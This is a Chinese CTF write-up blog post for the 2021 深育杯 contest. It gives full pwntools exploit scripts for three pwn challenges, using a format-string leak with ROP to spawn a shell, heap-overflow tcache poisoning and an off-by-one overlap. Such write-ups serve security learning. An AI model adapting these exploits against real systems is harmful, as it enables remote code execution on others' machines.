深育杯2021


阅读数: 次   
字数统计: 1.5k字   |   阅读时长: 9分

深育杯

深育杯

find_flag

格式化字符串泄露canary,libc

栈溢出getshell

非常规libc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
#!/usr/bin/env python3
# coding=utf-8
from pwn import *

# from z3 import *
arch = "amd64"
filename = "find_flag"

ip = "192.168.37.244"
port =2001
# libc
# libc
local_libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
remote_libc = ELF("libc-2.28-145.el8.x86_64.so")
# ld
# local_ld=ELF("/lib64/ld-linux-x86-64.so.2")
# remote_ld=ELF("/lib64/ld-linux-x86-64.so.2")

context(os="linux", arch=arch, log_level="debug")
# context.terminal = ['tmux', 'split','-h']
content = 1

offset = 0
# elf
elf = ELF(filename)


def b(addr):
    bk = "b *$rebase" + str(addr)
    gdb.attach(io, bk)
    success("attach")


def pwn():
    io.recvuntil(b"Hi! What's your name? ")
    payload=b'%p%9$p%17$p%23$p'
    io.sendline(payload)
    io.recvuntil(b"0x")
    stack_addr=int(io.recv(12),16)
    _IO_2_1_stdout_=int(io.recv(14),16)
    canary=int(io.recv(18),16)
    __libc_start_main = int(io.recv(14), 16)-243

    success("stack_addr:" + hex(stack_addr))
    success("_IO_2_1_stdout_:"+hex(_IO_2_1_stdout_))
    success("canary:"+hex(canary))
    success("__libc_start_main:" + hex(__libc_start_main))
    libcbase=__libc_start_main-libc.symbols['__libc_start_main']
    success("libcbase:"+hex(libcbase))
    # # '''
	# # system	0x0448a0	0x0
	# # open	0x0ed290	0xa89f0
	# # read	0x0ed580	0xa8ce0
	# # write	0x0ed620	0xa8d80
	# # str_bin_sh	0x186c6c	0x1423cc
	# # _IO_2_1_stdout_	0x3c06e0	0x37be40'''
    pop_rdi = libcbase + next(libc.search(asm("pop rdi\nret")))
    system_addr=libcbase+libc.symbols['system']
    binsh_addr = libcbase + next(libc.search(b"/bin/sh\x00"))
    ret_addr=libcbase + next(libc.search(asm("ret")))
    success("pop_rdi:" + hex(pop_rdi))
    success("system_addr:" + hex(system_addr))
    success("binsh_addr:" + hex(binsh_addr))
    # gdb.attach(io)
    sleep(0.5)
    io.recvuntil(b"Anything else? ")
    ogg=onegadget[1]+libcbase
    payload=b'a'*(0x38)+p64(canary)+p64(0)+p64(pop_rdi)+p64(binsh_addr)+p64(system_addr)#+p64(ret_addr)+p64(ogg)#
    io.sendline(payload)
    # b()
    return 1


if __name__ == '__main__':
    global io
    flag = 1
    while flag >= 1:
        try:
            if content == 0:
                io = process("./" + filename)
                libc = local_libc
                # ld = local_ld
                # onegadget = [0x4f2c5, 0x4f322, 0x10a38c] #2.23 11.3
                onegadget = [0xe6c7e, 0xe6c81, 0xe6c84]  # 2.31 9.2
            else:
                io = remote(ip, port)
                libc = remote_libc
                # ld = remote_ld
                # onegadget = [0x4f2c5, 0x4f322, 0x10a38c] #2.23 11.3
                onegadget = [0xe6c7e, 0xe6c81, 0xe6c84]  # 2.31 9.2
            if (pwn() == 0):
                flag -= 1
                continue
            else:
                io.interactive()
                flag = 0
        except Exception as e:
            print(e)
            io.close()
            flag -= 1
            continue

create_code

add里面有个函数调用,但是限制shellcode单字节<0xf,我太菜了,构造不出来,再仔细一看,上面有个堆溢出,构造chunk1直接覆盖chunk2的size位,chunk3 free到unsorted bin中,show chunk2,将chunk3的fd,bk泄露出来,得到libc,tcache打free_hook结束

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
#!/usr/bin/env python3
# coding=utf-8
from pwn import *

# from z3 import *
arch = "amd64"
filename = "create_code"

ip = "192.168.37.244"
port =2007
# libc
# libc
local_libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
remote_libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
# ld
# local_ld=ELF("/lib64/ld-linux-x86-64.so.2")
# remote_ld=ELF("/lib64/ld-linux-x86-64.so.2")

context(os="linux", arch=arch, log_level="debug")
# context.terminal = ['tmux', 'split','-h']
content = 1

offset = 0
# elf
elf = ELF(filename)


def b(addr):
    bk = "b *$rebase" + str(addr)
    gdb.attach(io, bk)
    success("attach")

def add(idx,payload):
    io.recvuntil(b"> ")
    io.sendline(b'1')
    io.recvuntil(b"content: ")
    io.send(payload)

def show(idx):
    io.recvuntil(b"> ")
    io.sendline(b'2')
    io.recvuntil(b"id: ")
    io.sendline(str(idx).encode())

def free(idx):
    io.recvuntil(b"> ")
    io.sendline(b'3')
    io.recvuntil(b"id: ")
    io.sendline(str(idx).encode())

def pwn():
    for i in range(9):
        add(i,b'aaaaaaaa')
    # free(0)
    for i in range(6):
        free(3)
    free(0)
    free(1)
    # free(0)

    add(1, b'a' * (0x320)+p64(0)+p64(0x331)+p32(0x400))
    show(0)
    io.recv(0x334)
    addr=u64(io.recv(6).ljust(8,b'\x00'))
    success("addr:"+hex(addr))
    malloc_hook=addr-96-0x10
    success("malloc_hook:"+hex(malloc_hook))
    libcbase=malloc_hook-libc.symbols['__malloc_hook']
    success("libcbase:"+hex(libcbase))
    add(1,b'aaaa')
    free(0)
    free(0)
    free_hook=libcbase+libc.symbols['__free_hook']
    system_addr=libcbase+libc.symbols['system']
    binsh_addr=libcbase+next(libc.search(b'/bin/sh\x00'))
    ogg=onegadget[1]+libcbase
    payload=b'a' * (0x320)+p64(0)+p64(0x331)+p64(free_hook-0x20)
    add(0,payload)
    add(1,b'bbb')
    add(2,b'\x00'*(0x20)+p64(ogg))
    free(0)

    # b(0x01209)
    return 1


if __name__ == '__main__':
    global io
    flag = 1
    while flag >= 1:
        try:
            if content == 0:
                io = process("./" + filename)
                libc = local_libc
                # ld = local_ld
                # onegadget = [0x4f2c5, 0x4f322, 0x10a38c] #2.23 11.3
                onegadget = [0xe6c7e, 0xe6c81, 0xe6c84]  # 2.31 9.2
            else:
                io = remote(ip, port)
                libc = remote_libc
                # ld = remote_ld
                # onegadget = [0x4f2c5, 0x4f322, 0x10a38c] #2.23 11.3
                onegadget = [0xe6c7e, 0xe6c81, 0xe6c84]  # 2.31 9.2
            if (pwn() == 0):
                flag -= 1
                continue
            else:
                io.interactive()
                flag = 0
        except Exception as e:
            print(e)
            io.close()
            flag -= 1
            continue

writebook

off by one

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
#!/usr/bin/env python3
# coding=utf-8
from pwn import *

# from z3 import *
arch = "amd64"
filename = "writebook"

ip = "192.168.37.244"
port =2002
# libc
# libc
local_libc = ELF("/home/qingmu-z/Desktop/tools/pwn-change-libc/libs/2.27-3ubuntu1.4_amd64/libc-2.27.so")
remote_libc = ELF("/home/qingmu-z/Desktop/tools/pwn-change-libc/libs/2.27-3ubuntu1.4_amd64/libc-2.27.so")
# ld
# local_ld=ELF("/lib64/ld-linux-x86-64.so.2")
# remote_ld=ELF("/lib64/ld-linux-x86-64.so.2")

context(os="linux", arch=arch, log_level="debug")
# context.terminal = ['tmux', 'split','-h']
content = 1

offset = 0
# elf
elf = ELF(filename)


def b(addr):
    bk = "b *$rebase" + str(addr)
    gdb.attach(io, bk)
    success("attach")

def add(idx,size):
    io.recvuntil(b"> ")
    io.sendline(b'1')
    io.recvuntil(b"> ")
    if size>=0x10f:
        io.sendline(b'2')
    else:
        io.sendline(b'1')
    io.recvuntil(b"size: ")
    io.sendline(str(size).encode())

def edit(idx,payload):
    io.recvuntil(b"> ")
    io.sendline(b'2')
    io.recvuntil(b"Page: ")
    io.sendline(str(idx).encode())
    io.recvuntil(b"Content: ")
    io.send(payload)

def show(idx):
    io.recvuntil(b"> ")
    io.sendline(b'3')
    io.recvuntil(b"Page: ")
    io.sendline(str(idx).encode())

def free(idx):
    io.recvuntil(b"> ")
    io.sendline(b'4')
    io.recvuntil(b"Page: ")
    io.sendline(str(idx).encode())

def pwn():
    for i in range(7):
        add(i,0xf0)

    add(7,0xf0)
    add(8,0x88)
    add(9,0xf0)
    add(10,0x20)
    for i in range(7):
        free(i)
    free(7)
    edit(8,b'a'*(0x80)+p64(0x190))
    free(9)
    add(0,0x70)
    add(1, 0x78)
    show(8)
    io.recvuntil(b"Content: ")
    addr=u64(io.recv(6).ljust(8,b'\x00'))
    success("addr:"+hex(addr))
    malloc_hook=addr-96-0x10
    libcbase=malloc_hook-libc.symbols['__malloc_hook']
    success("libcbase:"+hex(libcbase))
    add(2,0x88)
    add(3,0x88)
    edit(3,b'/bin/sh\x00\n')
    free(2)
    free_hook=libcbase+libc.symbols['__free_hook']
    system_addr=libcbase+libc.symbols['system']
    success("system_addr:"+hex(system_addr))
    edit(8,p64(free_hook)+b'\n')
    add(4,0x88)
    add(5,0x88)
    edit(4,p64(system_addr)+b'\n')
    free(3)
    # b(0x00A68)
    return 1


if __name__ == '__main__':
    global io
    flag = 1
    while flag >= 1:
        try:
            if content == 0:
                io = process("./" + filename)
                libc = local_libc
                # ld = local_ld
                # onegadget = [0x4f2c5, 0x4f322, 0x10a38c] #2.23 11.3
                onegadget = [0xe6c7e, 0xe6c81, 0xe6c84]  # 2.31 9.2
            else:
                io = remote(ip, port)
                libc = remote_libc
                # ld = remote_ld
                # onegadget = [0x4f2c5, 0x4f322, 0x10a38c] #2.23 11.3
                onegadget = [0xe6c7e, 0xe6c81, 0xe6c84]  # 2.31 9.2
            if (pwn() == 0):
                flag -= 1
                continue
            else:
                io.interactive()
                flag = 0
        except Exception as e:
            print(e)
            io.close()
            flag -= 1
            continue


-------------本文结束感谢您的阅读-------------



谢谢你请我吃糖果

扫一扫,分享到微信

微信分享二维码
本站总访问量 本站访客数人次

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

朱登榜,来自河南郑州,河南大学学生,倘若文章有错误,望提醒修正,感谢!<br>qq:879322660<br>微信:z15981855791